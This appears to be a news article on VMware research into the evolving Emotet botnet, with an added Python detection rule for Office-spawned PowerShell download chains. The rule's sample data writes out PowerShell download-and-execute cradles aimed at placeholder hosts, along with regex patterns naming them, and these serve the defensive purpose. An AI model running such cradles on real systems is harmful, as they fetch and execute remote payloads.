VMware Research Uncovers Evolving Nature of Emotet Malware

In January 2021, law enforcement authorities from the Netherlands, Germany, the United States, the United Kingdom, France, Lithuania, Canada and Ukraine, coordinated by Europol and Eurojust, carried out one of the most significant botnet disruptions to date. They took control of the botnet's command-and-control infrastructure and redirected infected machines to servers under law enforcement control.

Since its discovery in 2014, Emotet has reigned as one of the most resilient pieces of malware ever created. It first became known as a banking Trojan used to steal banking credentials. Once it had gained persistence on a targeted endpoint, access to that system was sold on to other criminal groups.

“The infrastructure that was used by Emotet involved several hundred servers located across the world, all of these having different functionalities in order to manage the computers of the infected victims, to spread to new ones, to serve other criminal groups, and to ultimately make the network more resilient against takedown attempts,” Europol wrote in an announcement about the takedown. But as big as the takedown was, it wouldn’t be the last we saw of Emotet.

Earlier this year, the VMware Threat Analysis Unit observed waves of new Emotet attacks in its threat intelligence cloud, VMware Contexa. Threat researchers studied its new infection mechanisms, mapped the threat’s command-and-control (C2) infrastructure and analyzed the components delivered by the latest Emotet version.

By analyzing Emotet’s software development life cycle, VMware observed how quickly its C2 infrastructure could be changed and discovered how it obfuscates its configuration, adapts and tests evasive execution chains, deploys different attack vectors at different stages, laterally propagates and continues to evolve.

“To map the evolution of the Emotet threat, VMware Threat Analysis Unit created an analysis pipeline that continuously analyzed the new samples observed in their telemetry and extracted the command and control configuration. The researchers used a modified Emotet sample to connect to the command-and-control endpoints and obtain updates,” said Chad Skipper, global security technologist at VMware, during a presentation detailing the research.

The pattern of attacks examined by VMware's team is fairly well known at this point. An email delivers a Microsoft Office document laced with macros that, when enabled by the targeted victim, launch PowerShell commands to download the Emotet payload. Emotet then downloads further malware, such as TrickBot and QakBot.
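The execution chain in the paragraph above (Office document, macro, PowerShell, download) is something a detection engineer can check for directly in process-creation telemetry. The following Python is an added example and is not part of the VMware research or its analysis pipeline: it runs a simple rule over constructed process-creation records (Sysmon/EDR style, invented for this illustration), flags an Office application spawning a script host, decodes a PowerShell `-EncodedCommand` argument so the download URL becomes visible, and returns the findings. The field names, the `example.invalid` hosts and the sample records are all assumptions.

```python
"""Flag the Office -> script host -> download execution chain.

Added example, not VMware's tooling. The records below are constructed to
resemble Sysmon Event ID 1 / EDR process-creation logs; they are not real
telemetry, and the hosts under example.invalid are placeholders.
"""
import base64
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Parents that should essentially never spawn a script interpreter.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Children commonly abused as the first stage of a macro-based chain.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}
# Tokens that indicate a download cradle in a PowerShell command line.
DOWNLOAD_HINTS = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b|"
    r"invoke-expression|bitsadmin|https?://", re.I)
URL_RE = re.compile(r"https?://[^\s'\"<>]+", re.I)
ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


@dataclass
class Finding:
    parent: str
    child: str
    download_cradle: bool
    urls: List[str] = field(default_factory=list)
    decoded: Optional[str] = None


def basename(path: str) -> str:
    """Normalise an image path to its lower-cased file name."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Decode a PowerShell -EncodedCommand (base64 of UTF-16LE), or None."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def detect_office_script_chain(events: List[ProcEvent]) -> List[Finding]:
    """Return one Finding per Office-spawned script host in `events`."""
    findings = []
    for ev in events:
        parent, child = basename(ev.parent_image), basename(ev.image)
        if parent not in OFFICE_PARENTS or child not in SCRIPT_HOSTS:
            continue
        decoded = decode_encoded_command(ev.command_line)
        # Inspect both the raw and the decoded command line for a cradle.
        text = ev.command_line + (" " + decoded if decoded else "")
        findings.append(Finding(
            parent=parent, child=child,
            download_cradle=bool(DOWNLOAD_HINTS.search(text)),
            urls=URL_RE.findall(text), decoded=decoded))
    return findings


# Constructed sample data. The encoded command is built here so the sample
# stays self-consistent; it is not taken from a real Emotet document.
_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://stage1.example.invalid/a.ps1')"
_ENCODED = base64.b64encode(_CRADLE.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              f"powershell.exe -w hidden -enc {_ENCODED}"),
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -NoProfile -c Get-ChildItem C:\\Temp"),
    ProcEvent(r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
              r"C:\Windows\System32\cmd.exe",
              'cmd.exe /c powershell -ep bypass -c "iwr http://stage1.example.invalid/x.dll '
              '-OutFile C:\\Users\\Public\\x.dll"'),
    ProcEvent(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              r"C:\Windows\splwow64.exe", "splwow64.exe 12288"),
]

if __name__ == "__main__":
    for f in detect_office_script_chain(SAMPLE_EVENTS):
        print(f"{f.parent} -> {f.child} cradle={f.download_cradle} urls={f.urls}")
```

The rule deliberately fires on any Office-to-script-host spawn, not only on ones with a visible download cradle, since Emotet's chain has varied the exact command line between waves; the `download_cradle` flag and extracted URLs are there to prioritise, not to gate, the alert. Decoding `-EncodedCommand` matters because the cradle in the first record is invisible to a plain substring match.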

Notable observations from the research include:

  • Emotet attack patterns are in continuous evolution: Using a new similarity metric, the VMware Threat Analysis Unit's clustering analysis identified several distinct initial infection waves, each changing how the malware is delivered. This ongoing adaptation of Emotet's execution chain is one reason the malware has been successful for so long. The report characterizes Emotet's execution chains, explores its infection techniques and illustrates the evolution of its tactics, techniques and procedures so that defenders can recognize them in their own environment.
  • Emotet can serve a number of attack objectives: The VMware Threat Analysis Unit intercepted two newly updated modules: the first targets the Google Chrome browser to steal credit card information, and the second uses the SMB protocol to spread laterally. These examples demonstrate how broad Emotet's capabilities are.
  • Emotet authors are hiding their command-and-control infrastructure: The actors behind Emotet go to great lengths to make the information about the malware’s command-and-control infrastructure difficult to extract. The VMware Threat Analysis Unit developed a tool to bypass the anti-analysis techniques and the report shares how to extract the IP addresses and ports of the command-and-control servers from Emotet’s samples to understand the attack’s infrastructure.
  • Emotet’s infrastructure is constantly shifting: By analyzing the network endpoints involved in the command-and-control infrastructure, the VMware Threat Analysis Unit could track and document the botnets’ evolution.

The VMware report provides a more detailed look at the findings, including the inner workings of Emotet and its exploitation chains, as well as network indicators of compromise.